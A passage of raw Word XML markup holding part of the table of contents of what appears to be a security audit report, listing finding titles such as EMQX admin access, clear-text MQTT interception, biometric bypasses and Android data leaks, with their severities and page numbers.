                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Critical)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250050">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-007</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP3/5:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>EMQX</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Weak</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Policy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Critical)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250049">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-012</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>MitM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>without</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Warnings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>clear-text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>MQTT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Traffic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Critical)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250048">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-014</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1/3:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Arbitrary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>MQTT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Message</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Spoofing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>IDOR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(High)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
            <w:spacing w:line="297" w:lineRule="auto"/>
            <w:ind w:right="363"/>
          </w:pPr>
          <w:r>
            <w:rPr/>
            <w:t>BFY-01-015</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>WP1:</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Fingerprint</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Bypass</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>on</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Rooted</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Devices</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>via</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Crafted</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Intent</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>(Low)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="37"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>27 BFY-01-016</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-13"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>WP1:</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-13"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Fingerprint</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-13"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Bypass</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-12"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>via</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-13"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Token</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-13"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Access</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-12"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-2"/>
            </w:rPr>
            <w:t>(High)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-5"/>
            </w:rPr>
            <w:t>28</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
            <w:spacing w:line="252" w:lineRule="exact" w:before="0"/>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250047">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-017</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Fingerprint</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bypass</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Lack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>of</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Keystore</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>usage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(High)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250046">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-018</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>iOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Biometric</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bypass</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Implementation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Flaw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(High)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250045">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-026</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP3:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Arbitrary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>takeover</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>EMQX/MongoDB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Critical)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250044">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-032</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Possible</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Phishing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>StrandHogg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>2.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>on</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Android</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Medium)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250043">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-033</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Leaks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Missing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Screen</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>on</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Android</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Low)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250042">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-035</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Multiple</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Leaks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Android</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Debug</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Messages</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Medium)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250041">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-036</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Biometric</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bypass</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Unsafe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>iOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Keychain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Use</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Medium)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250040">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-037</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>PII</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>&amp;</w:t>
            </w:r>
